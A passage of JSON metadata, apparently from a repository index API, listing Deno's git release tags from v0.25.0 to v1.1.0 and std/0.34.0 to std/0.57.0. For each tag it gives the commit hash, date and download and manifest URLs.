pendencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1